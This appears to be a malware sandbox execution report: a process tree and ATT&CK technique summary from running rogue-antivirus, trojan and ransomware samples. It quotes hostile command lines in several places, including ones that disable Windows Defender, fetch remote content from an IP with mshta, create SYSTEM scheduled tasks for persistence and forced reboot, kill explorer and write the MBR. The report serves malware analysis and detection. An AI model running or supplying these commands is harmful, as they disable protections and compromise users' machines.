C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Walliant\ska2pwej.aeh.exe"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Walliant\ska2pwej.aeh.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\is-EAGE0.tmp\ska2pwej.aeh.tmp"C:\Users\Admin\AppData\Local\Temp\is-EAGE0.tmp\ska2pwej.aeh.tmp" /SL5="$1201E0,4511977,830464,C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Walliant\ska2pwej.aeh.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:548 -
C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe"C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe1⤵PID:5412
-
C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exeC:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4728
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Downloadly\x2s443bc.cs1.exe"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Downloadly\x2s443bc.cs1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5996 -
C:\Users\Admin\AppData\Local\Temp\is-C6DB9.tmp\x2s443bc.cs1.tmp"C:\Users\Admin\AppData\Local\Temp\is-C6DB9.tmp\x2s443bc.cs1.tmp" /SL5="$3045E,15784509,779776,C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\modern\Downloadly\x2s443bc.cs1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4012 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
C:\Users\Admin\Programs\Downloadly\Downloadly.exe"C:\Users\Admin\Programs\Downloadly\Downloadly.exe" EnablePro3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4716 -
C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exeC:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\is-89DUJ.tmp\MassiveInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-89DUJ.tmp\MassiveInstaller.tmp" /SL5="$2054C,10474064,1082880,C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4860 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Massive.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im MassiveUI.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Users\Admin\Programs\Massive\Massive.exe"C:\Users\Admin\Programs\Massive\Massive.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5312 -
C:\Users\Admin\Programs\Massive\crashpad_handler.exeC:\Users\Admin\Programs\Massive\crashpad_handler.exe --no-rate-limit --database=C:\Users\Admin\AppData\Local\Massive\crashdumps --metrics-dir=C:\Users\Admin\AppData\Local\Massive\crashdumps --url=https://o428832.ingest.sentry.io:443/api/5375291/minidump/?sentry_client=sentry.native/0.4.9&sentry_key=5647f16acff64576af0bbfb18033c983 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\d8ab4b46-52d7-4df7-14a1-ef1a72bfc943.run\__sentry-event --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\d8ab4b46-52d7-4df7-14a1-ef1a72bfc943.run\__sentry-breadcrumb1 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\d8ab4b46-52d7-4df7-14a1-ef1a72bfc943.run\__sentry-breadcrumb2 --initial-client-data=0x410,0x414,0x418,0x3d4,0x41c,0x7ff774432fe0,0x7ff774432fa0,0x7ff774432fb07⤵
- Executes dropped EXE
PID:5316
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Update-8984a37a-dc7d-4822-84d3-c9ebb9f8cb75\downloadly_installer.exe"C:\Users\Admin\AppData\Local\Temp\Update-8984a37a-dc7d-4822-84d3-c9ebb9f8cb75\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG4⤵
- Executes dropped EXE
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\is-0N7J1.tmp\downloadly_installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-0N7J1.tmp\downloadly_installer.tmp" /SL5="$40524,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-8984a37a-dc7d-4822-84d3-c9ebb9f8cb75\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1156 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Update-44822007-26c0-4f52-9cdf-ab64c9a60e2f\downloadly_installer.exe"C:\Users\Admin\AppData\Local\Temp\Update-44822007-26c0-4f52-9cdf-ab64c9a60e2f\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\is-NHG6U.tmp\downloadly_installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-NHG6U.tmp\downloadly_installer.tmp" /SL5="$80520,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-44822007-26c0-4f52-9cdf-ab64c9a60e2f\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2612
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Programs\Downloadly\Downloadly.exe"1⤵PID:904
-
C:\Users\Admin\Programs\Downloadly\Downloadly.exeC:\Users\Admin\Programs\Downloadly\Downloadly.exe2⤵
- Executes dropped EXE
PID:4004
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\" -an -ai#7zMap1380:5236:7zEvent46121⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2780 -
C:\Windows\SysWOW64\net.exenet stop wscsvc2⤵
- System Location Discovery: System Language Discovery
PID:5552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wscsvc3⤵
- System Location Discovery: System Language Discovery
PID:1428
-
-
-
C:\Windows\SysWOW64\net.exenet stop winmgmt /y2⤵
- System Location Discovery: System Language Discovery
PID:5300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop winmgmt /y3⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
-
C:\Windows\SysWOW64\net.exenet start winmgmt2⤵
- System Location Discovery: System Language Discovery
PID:4088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start winmgmt3⤵PID:2088
-
-
-
C:\Windows\SysWOW64\net.exenet start wscsvc2⤵PID:1464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start wscsvc3⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
C:\Windows\SysWOW64\Wbem\mofcomp.exemofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 19922⤵
- Program crash
PID:6036
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:4632
-
-
\??\globalroot\systemroot\system32\usеrinit.exe/install2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\AnVi\avt.exe" -noscan1⤵PID:3096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5272 -
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵PID:5920
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1984 -
C:\WINDOWS\302746537.exe"C:\WINDOWS\302746537.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2791.tmp\302746537.bat" "3⤵PID:1452
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s c:\windows\comctl32.ocx4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:520
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s c:\windows\mscomctl.ocx4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2832
-
-
\??\c:\windows\antivirus-platinum.exec:\windows\antivirus-platinum.exe4⤵
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3100
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h c:\windows\antivirus-platinum.exe4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1296
-
-
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]1⤵PID:5380
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4576 -
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4104
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3676
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5212 -
C:\Users\Admin\AppData\Local\6AdwCleaner.exe"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:1464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\6AdwCleaner.exe" -auto1⤵PID:240
-
C:\Users\Admin\AppData\Local\6AdwCleaner.exeC:\Users\Admin\AppData\Local\6AdwCleaner.exe -auto2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2880
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5204 -
C:\Users\Admin\AppData\Local\Temp\is-H93P7.tmp\is-EDQVV.tmp"C:\Users\Admin\AppData\Local\Temp\is-H93P7.tmp\is-EDQVV.tmp" /SL4 $205BE "C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]" 232353 522242⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5916
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4888
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:4012
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Enumerates VirtualBox registry keys
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6040
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5852 -
C:\Nava Labs\Nava Shield\NavaShield.exe"C:\Nava Labs\Nava Shield\NavaShield.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2676 -
C:\Nava Labs\Nava Shield\NavaBridge.exe"C:\Nava Labs\Nava Shield\NavaBridge.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1012
-
-
C:\Nava Labs\Nava Shield\NavaDebugger.exe"C:\Nava Labs\Nava Shield\NavaDebugger.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4592 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.shemaleseduction.com/4⤵PID:716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.shemaleseduction.com/5⤵PID:4488
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Nava Labs\Nava Shield\navashield.exe1⤵PID:4740
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x248 0x4981⤵PID:5040
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 5162⤵
- Program crash
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1556 -ip 15561⤵PID:5064
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
PID:4080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 4842⤵
- Program crash
PID:1848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4080 -ip 40801⤵PID:236
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5124 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5684
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4940
-
-
C:\Users\Admin\AppData\Roaming\vbvxcn.exeC:\Users\Admin\AppData\Roaming\vbvxcn.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5676 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5784
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1388
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=ONBLRSLW&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=3082"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\DOWNLO~1\MALWAR~1\MALWAR~1\rogues\EN2B55~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:6008
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5228 -
C:\Program Files (x86)\VAV\vav.exe"C:\Program Files (x86)\VAV\vav.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1948 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 5923⤵
- Program crash
PID:2296
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Program Files (x86)\VAV\vav.exe"3⤵
- Loads dropped DLL
PID:1452
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1948 -ip 19481⤵PID:5728
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Program Files (x86)\VAV\vav.exe1⤵PID:5172
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Program Files (x86)\VAV\vav.exe1⤵PID:4152
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\rogues\[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2724 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 3882⤵
- Program crash
PID:4480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2724 -ip 27241⤵PID:3808
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\60e47bfc89484e2c8caf9bd1add4670c /t 4584 /p 28801⤵PID:744
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\" -an -ai#7zMap24955:198:7zEvent284011⤵PID:1844
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\[email protected]"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:392 -
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:1720 -
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe1⤵PID:2748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2780 -ip 27801⤵PID:1688
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\davepl\" -an -ai#7zMap880:1494:7zEvent94721⤵PID:5108
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\davepl\Endermanch@RegistryCleaner_SOReferral.exe"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\davepl\Endermanch@RegistryCleaner_SOReferral.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5380 -
C:\Users\Admin\AppData\Local\Temp\GLB2268.tmpC:\Users\Admin\AppData\Local\Temp\GLB2268.tmp 4736 C:\Users\Admin\DOWNLO~1\MALWAR~1\MALWAR~1\davepl\ENC9FB~1.EXE2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2936 -
C:\PROGRA~2\REGIST~1\RegClean.exe"C:\PROGRA~2\REGIST~1\RegClean.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\PROGRA~2\REGIST~1\Regclean.exe1⤵PID:4712
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\PROGRA~2\REGIST~1\RegClean.exe1⤵PID:4216
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\" -an -ai#7zMap29016:3116:7zEvent234191⤵PID:5540
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 152⤵
- System Location Discovery: System Language Discovery
PID:976 -
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 448780361 && exit"3⤵PID:4080
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 09:32:003⤵PID:2712
-
-
C:\Windows\B38D.tmp"C:\Windows\B38D.tmp" \\.\pipe\{489C00CE-C802-4955-A9E7-B538DDBF965A}3⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\[email protected]"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\[email protected]"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:64 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
PID:1752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\ransomwares\[email protected]1⤵PID:4880
Network
MITRE ATT&CK Enterprise v16
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
4Disable or Modify Tools
2Safe Mode Boot
1Indicator Removal
1File Deletion
1Modify Registry
8Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
9Software Discovery
2Security Software Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1Virtualization/Sandbox Evasion
1Replay Monitor
